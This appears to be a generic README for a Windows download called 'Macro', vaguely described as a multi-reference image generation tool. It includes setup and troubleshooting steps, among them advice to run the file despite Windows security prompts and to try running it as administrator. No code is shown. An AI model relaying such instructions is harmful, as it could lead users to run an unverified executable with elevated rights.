🚀 Getting Started

Macro is a Windows app for working with multi-reference image generation tasks. It helps you load reference images, organize them, and run the app from a simple download package.

Download Macro for Windows

🖥️ What You Need

Before you install Macro, check that your PC has:

  • Windows 10 or Windows 11
  • At least 8 GB of RAM
  • 2 GB of free disk space
  • A modern graphics card if you plan to use image-heavy features
  • Internet access for the first download

For best results, use a PC with 16 GB of RAM or more.

📦 Download and Install

  1. Open the release page using the link above.
  2. Look for the latest release at the top of the page.
  3. Download the Windows file for Macro.
  4. If the file is a ZIP archive, right-click it and choose Extract All.
  5. Open the extracted folder.
  6. Double-click the Macro app file to start it.

If Windows shows a security prompt, choose the option to run the file after you confirm it came from this repo.

🪟 Run Macro on Windows

After install, launch Macro from the folder where you extracted it.

If the app opens in a separate window, keep it open while you work. If you want to use it again later, create a shortcut on your desktop:

  1. Right-click the Macro app file.
  2. Select Send to.
  3. Choose Desktop.

You can now start Macro from your desktop with one double-click.

🧭 First-Time Setup

When you open Macro for the first time, follow these steps:

  1. Choose your reference images.
  2. Load them into the app.
  3. Set the output folder where you want results saved.
  4. Pick the image size or format you want.
  5. Start the process.

If you plan to use many images, keep them in one folder before you begin. This makes it easier to select them in the app.

🖼️ What Macro Is For

Macro is built for image workflows that need more than one reference file. It can help with:

  • Multi-reference image generation
  • Comparing image sets
  • Organizing visual data
  • Running benchmark-style image tasks
  • Preparing data for computer vision work

This makes it useful for end users who want a simple way to handle structured image sets without working through a complex setup.

🧰 Basic Use

Use Macro like this:

  1. Open the app.
  2. Add your reference images.
  3. Check the preview or list of loaded files.
  4. Choose your output settings.
  5. Start the run.
  6. Wait for the app to finish.
  7. Open the output folder and review the result.

If the app offers presets, start with a default preset first. That gives you a clear baseline before you change settings.

🗂️ File Tips

To keep things simple:

  • Use short folder names
  • Keep source images in one place
  • Avoid special characters in file names
  • Use PNG or JPG files for best compatibility
  • Save output to a folder you can find fast

If you work with many image sets, create one folder for each project.

🛠️ Common Issues

If Macro does not open:

  • Make sure you extracted the ZIP file
  • Check that the file is not still inside a compressed folder
  • Try running the app as administrator
  • Restart your PC and open it again

If images do not load:

  • Check that the file type is supported
  • Make sure the file is not damaged
  • Move the images to a simple folder path like C:\Images\MacroTest

If the app runs slowly:

  • Close other heavy apps
  • Use smaller image sets
  • Reduce image size if the app gives that option
  • Confirm your graphics driver is up to date

🔒 Safety Check

Before you run any downloaded file, make sure it came from the release page linked above. Keep your files in a known folder and avoid renaming app files unless needed for setup.
